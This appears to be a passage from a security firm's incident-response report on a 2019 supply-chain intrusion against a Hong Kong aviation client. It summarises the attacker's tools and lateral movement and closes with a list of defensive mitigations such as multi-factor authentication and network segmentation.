In an incident in late 2019, we responded to a supply-chain compromise carried out by a likely espionage group against a Hong Kong client in the aviation sector. The attacker targeted a subsidiary of the client by exploiting an unpatched firewall vulnerability to obtain valid VPN credentials. Once inside the victim’s network, the threat actor conducted extensive reconnaissance and staged various tools on internal servers. Tools included the credential dumping Mimikatz, NBTScan for network scanning, and PSExec for lateral movement.

After more than a month in the subsidiary’s network, the threat actor exploited the trusted connection with the main organisation’s network to move across. Fortunately, the intrusion in the main organisation’s network was detected in time and it did not result in exfiltration of data. Nonetheless, we saw similar tactics, techniques and procedures used against another Hong Kong critical national infrastructure company in 2018. This suggests that espionage threat actors continue to pose a threat to Hong Kong organisations in strategic sectors.

Mitigations

Despite the range of potential threats to companies in Hong Kong, cyber security best practices and common hygiene methods can help deter a significant portion of the cyber attacks we observed.

To improve your organisation’s resilience to cyber attacks we suggest to:

  • Enforce the use of multi-factor authentication for remote access
  • Restrict domain admin rights
  • Limit exposure of public-facing systems
  • Ensure that best practices for network segmentation are observed
  • Conduct regular security awareness training for IT and non-IT staff
  • Perform regular cyber attack simulations to ensure resiliency
  • Consider establish or outsource a Security Operation Centre (SOC) for security log monitoring and threat hunting
  • Ingest timely Cyber Threat Intelligence feeds and reporting for proactive defense against upcoming threats